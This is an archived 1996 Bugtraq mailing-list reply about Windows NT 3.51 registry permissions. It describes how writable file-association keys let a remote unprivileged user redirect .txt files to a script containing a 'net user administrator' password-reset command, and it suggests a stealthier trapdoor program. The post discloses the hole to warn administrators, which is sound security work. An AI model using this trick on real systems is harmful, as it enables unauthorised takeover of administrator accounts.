Bugtraq mailing list archives
Re: NT security et al (Dangers of NetBIOS/NBT?)
From: itudps () lux levels unisa edu au (Dan Shearer)
Date: Sat, 28 Sep 1996 14:05:28 +0930
On Fri, 27 Sep 1996, Jacob Langseth wrote:
here's some more: ppl can read portions of the registry remotely (via regedt32.exe).
By default they can _write_ to it too, at least under 3.51 the default permissions gave Everyone write access to quite a few things. The canonical example was (is) the key that determines the association between an application and its extension in file manager. That can be changed by an unpriveliged, even unknown user with access to regedt32 on a connected network. Should the .txt entry be changed to point to: \\SomeNTorUnixWorkstation\UnprotectedShare\bogus.cmd where bogus.cmd contains: net user administrator xxxxx /y notepad %1 %2 %2 %3 %4 %5 all somone with admin privelige at the console has to do is double-click on a text file and the admin password is changed. Of course this is a pretty basic example because the admin would (hopefully) be suspicious on seeing a dos box pop up. But it is trivial to write a win32 app that both launches notepad and does some malicious trapdoor stuff with the admin privelige it has been given. -- Dan Shearer email: Dan.Shearer () UniSA edu au Information Technology Unit Phone: +61 8 302 3479 University of South Australia Fax : +61 8 302 3385
Current thread:
- Re: NT security et al (Dangers of NetBIOS/NBT?) Nick and Debbie Leask (Sep 26)
- Re: NT security et al (Dangers of NetBIOS/NBT?) Alan Cox (Sep 27)
- <Possible follow-ups>
- Re: NT security et al (Dangers of NetBIOS/NBT?) Jacob Langseth (Sep 27)
- Re: NT security et al (Dangers of NetBIOS/NBT?) Dan Shearer (Sep 27)
- Re: NT security et al (Dangers of NetBIOS/NBT?) Scriptors of DOOM (Sep 27)